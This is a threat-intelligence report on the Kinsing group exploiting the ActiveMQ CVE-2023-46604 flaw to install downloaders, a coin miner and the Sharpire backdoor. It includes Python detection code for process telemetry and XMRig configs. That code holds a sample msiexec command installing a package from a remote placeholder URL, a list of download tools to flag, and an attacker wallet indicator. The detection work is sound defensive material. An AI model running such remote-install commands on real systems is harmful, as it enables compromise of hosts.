Case of ActiveMQ Vulnerability Exploitation to Install Sharpire (Kinsing)
AhnLab SEcurity intelligence Center (ASEC) has confirmed that the Kinsing threat actor is still distributing malware by exploiting known vulnerabilities. Since the disclosure of the CVE-2023-46604 vulnerability in Apache ActiveMQ, the threat actor has been exploiting it to install malware on both Linux and Windows systems. [1] Aside from the well-known XMRig and Stager, the latest attack cases also involved Sharpire, a .NET backdoor that supports PowerShell Empire. To take control of the infected system, the threat actor uses CobaltStrike, Meterpreter, and PowerShell Empire together.
1. Kinsing (H2Miner)
Kinsing, also known as H2Miner, was first identified by the Alibaba Cloud Security team in January 2020. [2] The malware strains constantly add new attack techniques for installing coin miners on poorly managed or vulnerable services. In the case of Docker, the Kinsing threat actor targets misconfigured Docker daemon API ports, [3] while for Redis, they exploit a remote code execution vulnerability. Other cases include the Log4j vulnerability (CVE-2021-44228) and the ActiveMQ vulnerability (CVE-2023-46604). [4] Aside from exploiting vulnerabilities, they also leverage SSH credentials stored on infected systems for lateral movement. [5]
2. ActiveMQ Vulnerability (CVE-2023-46604)
CVE-2023-46604 is a remote code execution vulnerability in Apache ActiveMQ, an open-source messaging and integration pattern server. If an unpatched Apache ActiveMQ server is exposed to the Internet, threat actors can remotely execute malicious commands and take control of the system.
The vulnerability is exploited by manipulating the serialized class type that instructs the OpenWire protocol to instantiate a class found in the classpath. If an attacker sends a manipulated packet, the vulnerable server uses the URL contained in the packet to load the class XML configuration file.
- Recommendation to Apply Security Update for Apache ActiveMQ (CVE-2023-46604) [6]
CVE-2023-46604 has recently started to be exploited, and in Korea, attacks by the Andariel group, HelloKitty ransomware [7], and Mauri ransomware have been identified. [8]
3. Latest attack cases of Kinsing threat actor
Recently, a case was identified in which threat actors exploited the CVE-2023-46604 vulnerability to distribute malware to vulnerable ActiveMQ servers in Korea. The vulnerability is generally exploited by various CoinMiner threat actors, but the Kinsing threat actor installs several other types of malware as well.

Figure 1. Vulnerable ActiveMQ service installing the Stager downloader
The vulnerable Java process of Apache ActiveMQ loads the XML configuration file provided by the threat actor and executes the command specified in it. The following is the XML configuration file used in the attack; it uses the msiexec command to install MSI malware from an external source.

Figure 2. Class XML configuration file used in the attack
During the attack, the threat actor also installed a malware strain named “mm13.exe” in addition to the MSI. Both the MSI and “mm13.exe” are downloader malware. The download is currently unavailable, so it is not known what malware was downloaded. In general, however, this type of malware downloads and executes CobaltStrike or Metasploit’s Meterpreter in memory. This type is also known as a Stager.
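The chain described above (the broker's Java process spawning msiexec to pull a package from an external URL) is straightforward to catch in process-creation telemetry. The following is an added detection example written for this article, not code from the report or from AhnLab; it runs over constructed Sysmon-style records, assumes the broker runs under java.exe with "activemq" in its command line, and treats the list of suspicious child processes as a tunable starting point rather than a fact from the report.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Any http(s) URL inside a command line.
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Children that a message broker's JVM has no business spawning from the
# request path. Assumed starting list (not from the report); tune it.
SUSPICIOUS_CHILDREN = {
    "msiexec.exe", "cmd.exe", "powershell.exe", "certutil.exe",
    "bitsadmin.exe", "mshta.exe", "rundll32.exe",
}


@dataclass
class ProcessEvent:
    """Minimal process-creation record (Sysmon Event ID 1-like fields)."""
    parent_image: str
    parent_cmdline: str
    image: str
    cmdline: str


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_activemq_jvm(ev: ProcessEvent) -> bool:
    # Assumption: the broker runs under java.exe with "activemq" somewhere in
    # its command line (jar or classpath). Adjust to the deployment.
    return _basename(ev.parent_image) == "java.exe" and "activemq" in ev.parent_cmdline.lower()


def classify(ev: ProcessEvent) -> List[str]:
    """Return the reasons an event is suspicious; an empty list means benign."""
    reasons: List[str] = []
    if not is_activemq_jvm(ev):
        return reasons
    child = _basename(ev.image)
    if child in SUSPICIOUS_CHILDREN:
        reasons.append(f"ActiveMQ JVM spawned {child}")
    # The report's case: msiexec fetching the package from an external URL.
    if child == "msiexec.exe" and URL_RE.search(ev.cmdline):
        reasons.append("msiexec installing a package from a remote URL")
    return reasons


def scan(events: List[ProcessEvent]) -> List[Tuple[int, List[str]]]:
    """Index and reasons for every flagged event, in input order."""
    hits = []
    for idx, ev in enumerate(events):
        reasons = classify(ev)
        if reasons:
            hits.append((idx, reasons))
    return hits


# Constructed sample events (not real telemetry). Hostnames use the
# reserved .invalid TLD as placeholders.
SAMPLE_EVENTS = [
    ProcessEvent(  # the report's pattern: broker JVM -> msiexec with a URL
        r"C:\Program Files\Java\jre\bin\java.exe",
        "java -cp C:\\apache-activemq\\bin\\activemq.jar org.apache.activemq.console.Main start",
        r"C:\Windows\System32\msiexec.exe",
        "msiexec /q /i http://downloads.placeholder.invalid/pkg.msi",
    ),
    ProcessEvent(  # broker spawning another JVM: normal for tooling
        r"C:\Program Files\Java\jre\bin\java.exe",
        "java -cp C:\\apache-activemq\\bin\\activemq.jar org.apache.activemq.console.Main start",
        r"C:\Program Files\Java\jre\bin\java.exe",
        "java -version",
    ),
    ProcessEvent(  # ordinary local install from Explorer: no alert
        r"C:\Windows\explorer.exe", "explorer.exe",
        r"C:\Windows\System32\msiexec.exe", r"msiexec /i C:\Users\u\Downloads\setup.msi",
    ),
    ProcessEvent(  # broker JVM spawning a shell
        r"C:\Program Files\Java\jre\bin\java.exe",
        "java -jar activemq.jar start",
        r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami",
    ),
]

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS):
        print(idx, "; ".join(reasons))
```

The parent-process condition is what keeps the rule quiet: msiexec with a remote URL is unusual but not unheard of from an administrator's session, whereas a message broker's JVM spawning an installer, a shell, or a download utility has no legitimate cause in the request path and is worth an alert on its own.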

Figure 3. Download URL of Stager
It is also worth noting that the download server used in the attack was found to host malware targeting Linux systems as well. The following is a relatively simple Bash script that adds the Kinsing threat actor’s wallet address to the XMRig configuration file, as mentioned in a previous Fortinet report.

Figure 4. Kinsing threat actor’s Bash malware
- Wallet – 1 : “linux
- Password – 1 : “linux
- Wallet – 2 : “89UoMhtsrpaJTvmJBbvy1cTdg38pomPFnW5Z4sniL2izcLQyGBkEGd96TcBJtzQUi6KAL5Ehe4cFpEMNdGF7tFKpJ1DqE8X
- Password – 2 : “lin
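Because the Bash script above only edits the XMRig configuration, the wallet address it writes is a durable host-based indicator. The following is an added example written for this article, not code from the report; it scans an XMRig-style config.json for pool users that have the shape of a Monero address, flags the wallet the report attributes to Kinsing, and falls back to a plain text scan so a truncated or hand-edited file is still caught. The sample config, pool hostnames and the second wallet are constructed placeholders.

```python
import json
import re
from typing import Dict, List

# Wallet address the report attributes to the Kinsing actor (Figure 4).
KINSING_WALLET = "89UoMhtsrpaJTvmJBbvy1cTdg38pomPFnW5Z4sniL2izcLQyGBkEGd96TcBJtzQUi6KAL5Ehe4cFpEMNdGF7tFKpJ1DqE8X"

# Monero mainnet addresses: 95 base58 characters, standard addresses start
# with 4 and subaddresses with 8 (the alphabet excludes 0, O, I and l).
# Lookarounds stop a longer base58 run from matching as a substring.
MONERO_ADDR_RE = re.compile(
    r"(?<![1-9A-HJ-NP-Za-km-z])[48][1-9A-HJ-NP-Za-km-z]{94}(?![1-9A-HJ-NP-Za-km-z])"
)


def find_monero_addresses(text: str) -> List[str]:
    """All Monero-shaped addresses in arbitrary text, deduplicated and sorted."""
    return sorted({m.group(0) for m in MONERO_ADDR_RE.finditer(text)})


def inspect_xmrig_config(raw: str) -> List[Dict[str, object]]:
    """Report every pool whose user field is a Monero address, flagging the
    known IoC. Falls back to a text scan when the JSON is malformed."""
    findings: List[Dict[str, object]] = []
    seen = set()
    try:
        cfg = json.loads(raw)
    except json.JSONDecodeError:
        cfg = None
    if isinstance(cfg, dict):
        for pool in cfg.get("pools", []) or []:
            user = str(pool.get("user", ""))
            if MONERO_ADDR_RE.fullmatch(user):
                findings.append({"pool": pool.get("url"), "wallet": user,
                                 "known_kinsing": user == KINSING_WALLET})
                seen.add(user)
    # Text scan catches addresses outside the pools array or in broken files.
    for addr in find_monero_addresses(raw):
        if addr not in seen:
            findings.append({"pool": None, "wallet": addr,
                             "known_kinsing": addr == KINSING_WALLET})
            seen.add(addr)
    return findings


# Constructed sample in XMRig's config.json layout. Pool hosts use the
# reserved .invalid TLD; the second wallet is an obviously fake placeholder
# that merely has the right shape. The "linux" password is from Figure 4.
PLACEHOLDER_WALLET = "4" + "A" * 94
SAMPLE_CONFIG = json.dumps({
    "autosave": True,
    "cpu": True,
    "pools": [
        {"url": "pool.placeholder.invalid:3333", "user": KINSING_WALLET, "pass": "linux"},
        {"url": "backup.placeholder.invalid:5555", "user": PLACEHOLDER_WALLET, "pass": "x"},
    ],
})

if __name__ == "__main__":
    for f in inspect_xmrig_config(SAMPLE_CONFIG):
        tag = "KNOWN KINSING WALLET" if f["known_kinsing"] else "monero wallet"
        print(f"{tag}: {f['wallet'][:12]}... pool={f['pool']}")
```

Matching on address shape rather than only on the single known wallet means the scan still fires when the actor rotates wallets, which the structured pass and the text fallback both handle; the exact IoC match then tells the analyst which finding is attributable to this campaign.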
The threat actor’s download server also hosted a malware strain named Sharpire. PowerShell Empire is an open-source post-exploitation framework developed in PowerShell and used by various threat actors; Sharpire is a .NET backdoor that supports PowerShell Empire. The threat actor presumably used Sharpire alongside Cobalt Strike or Meterpreter to control the infected systems.

Figure 5. Configuration data of Sharpire
| Command | Feature |
|---|---|
| Default | Execute PowerShell command (Full) |
| shell | Execute PowerShell command (argument) |
| ls, dir, gci | List directory |
| mv, move | Move file |
| cp, copy | Copy file |
| rm, del, rmdir | Delete file |
| cd | Change current directory |
| ifconfig, ipconfig | Check network configuration information |
| ps, tasklist | List processes |
| route | Query routing table information |
| whoami, getuid | Query current user |
| hostname | Look up host name |
| reboot, restart | Reboot system |
| shutdown | Shut down system |
Table 1. List of commands supported by Sharpire
4. Conclusion
Threat actors continue to attack vulnerable, unpatched Apache ActiveMQ services. Among the identified attacks is a case in which the Kinsing threat actor, as in the past, installed coin miners to mine cryptocurrency. However, they were also found to install malware for controlling the infected systems. The Kinsing threat actor installs XMRig together with remote control tools such as CobaltStrike, Meterpreter, and Sharpire on infected systems, and uses these tools to mine cryptocurrency, steal information, and install ransomware.